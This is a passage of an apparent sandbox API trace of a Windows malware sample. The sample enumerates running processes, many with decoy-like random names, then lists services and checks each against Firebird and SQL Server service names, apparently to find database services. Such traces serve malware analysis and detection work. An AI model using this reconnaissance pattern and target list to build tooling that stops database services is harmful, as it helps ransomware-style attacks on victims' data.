(lpString="taskhostw.exe") returned 13 [0050.983] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0050.984] lstrlenW (lpString="UsoClient.exe") returned 13 [0050.984] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0050.985] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0050.985] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0050.986] lstrlenW (lpString="taskhostw.exe") returned 13 [0050.986] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0050.986] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0050.986] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0050.987] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0050.987] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0050.987] lstrlenW (lpString="msoia.exe") returned 9 [0050.988] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0050.988] lstrlenW (lpString="msoia.exe") returned 9 [0050.988] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0050.989] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0050.989] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0050.989] lstrlenW (lpString="screensaver.exe") returned 15 [0050.990] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0050.990] lstrlenW (lpString="xml upper.exe") returned 13 [0050.991] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0051.054] lstrlenW (lpString="defeat preston.exe") returned 18 [0051.054] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0051.055] lstrlenW (lpString="boss isolated.exe") returned 17 [0051.055] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0051.056] lstrlenW (lpString="member.exe") returned 10 [0051.056] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0051.057] lstrlenW (lpString="chubby-er.exe") returned 13 [0051.057] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0051.057] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0051.058] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0051.058] lstrlenW (lpString="organization.exe") returned 16 [0051.058] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0051.059] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0051.059] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0051.061] lstrlenW (lpString="spray-roman.exe") returned 15 [0051.061] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0051.062] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0051.062] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0051.063] lstrlenW (lpString="tank attacks.exe") returned 16 [0051.063] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0051.064] lstrlenW (lpString="wires jacket.exe") returned 16 [0051.064] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0051.065] lstrlenW (lpString="values.exe") returned 10 [0051.065] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0051.065] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0051.065] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0051.066] lstrlenW (lpString="printersaerospace.exe") returned 21 [0051.066] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0051.067] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0051.067] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0051.068] lstrlenW (lpString="dllhost.exe") returned 11 [0051.068] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0051.069] lstrlenW (lpString="joke.exe") returned 8 [0051.069] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0051.070] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0051.070] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0051.070] lstrlenW (lpString="documents.exe") returned 13 [0051.071] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0051.071] lstrlenW (lpString="rebel.exe") returned 9 [0051.071] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0051.072] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0051.072] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.073] lstrlenW (lpString="conhost.exe") returned 11 [0051.073] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.074] lstrlenW (lpString="conhost.exe") returned 11 [0051.074] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0051.074] lstrlenW (lpString="hgaibc.exe") returned 10 [0051.074] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.075] lstrlenW (lpString="cmd.exe") returned 7 [0051.075] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0051.077] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0051.077] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.078] lstrlenW (lpString="conhost.exe") returned 11 [0051.078] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.078] lstrlenW (lpString="conhost.exe") returned 11 [0051.078] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.079] lstrlenW (lpString="svchost.exe") returned 11 [0051.079] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0051.080] CloseHandle (hObject=0x324) returned 1 [0051.080] Sleep (dwMilliseconds=0x1f4) [0051.592] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea20 [0051.592] EnumServicesStatusExW (in: hSCManager=0x60ea20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0051.592] GetLastError () returned 0xea [0051.592] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0051.592] EnumServicesStatusExW (in: hSCManager=0x60ea20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0051.593] CloseServiceHandle (hSCObject=0x60ea20) returned 1 [0051.593] lstrlenW (lpString="Appinfo") returned 7 [0051.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0051.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0051.593] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0051.593] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0051.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0051.593] lstrlenW (lpString="AppXSvc") returned 7 [0051.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0051.594] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0051.594] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0051.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0051.594] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0051.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.594] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0051.594] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0051.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0051.594] lstrlenW (lpString="Audiosrv") returned 8 [0051.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0051.594] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0051.594] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0051.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0051.594] lstrlenW (lpString="BFE") returned 3 [0051.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0051.594] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0051.594] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0051.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0051.594] lstrlenW (lpString="BITS") returned 4 [0051.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0051.594] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0051.594] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0051.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0051.594] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0051.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0051.594] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0051.594] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0051.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0051.594] lstrlenW (lpString="CDPSvc") returned 6 [0051.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0051.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0051.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0051.595] lstrlenW (lpString="ClickToRunSvc") returned 13 [0051.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0051.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0051.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0051.595] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0051.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0051.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0051.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0051.595] lstrlenW (lpString="CryptSvc") returned 8 [0051.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0051.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0051.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0051.595] lstrlenW (lpString="DcomLaunch") returned 10 [0051.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0051.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0051.595] lstrlenW (lpString="DeviceAssociationService") returned 24 [0051.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0051.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0051.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0051.595] lstrlenW (lpString="Dhcp") returned 4 [0051.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0051.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0051.595] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0051.595] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0051.596] lstrlenW (lpString="Dnscache") returned 8 [0051.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0051.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0051.596] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0051.596] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0051.596] lstrlenW (lpString="DoSvc") returned 5 [0051.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0051.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0051.596] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0051.596] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0051.596] lstrlenW (lpString="DPS") returned 3 [0051.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0051.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0051.596] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0051.596] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0051.596] lstrlenW (lpString="DusmSvc") returned 7 [0051.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0051.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0051.596] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0051.596] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0051.596] lstrlenW (lpString="EventLog") returned 8 [0051.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0051.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0051.596] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0051.596] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0051.596] lstrlenW (lpString="EventSystem") returned 11 [0051.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0051.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0051.596] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0051.596] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0051.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0051.597] lstrlenW (lpString="FontCache") returned 9 [0051.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0051.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0051.597] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0051.597] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0051.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0051.597] lstrlenW (lpString="gpsvc") returned 5 [0051.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0051.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0051.597] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0051.597] lstrcmpiW 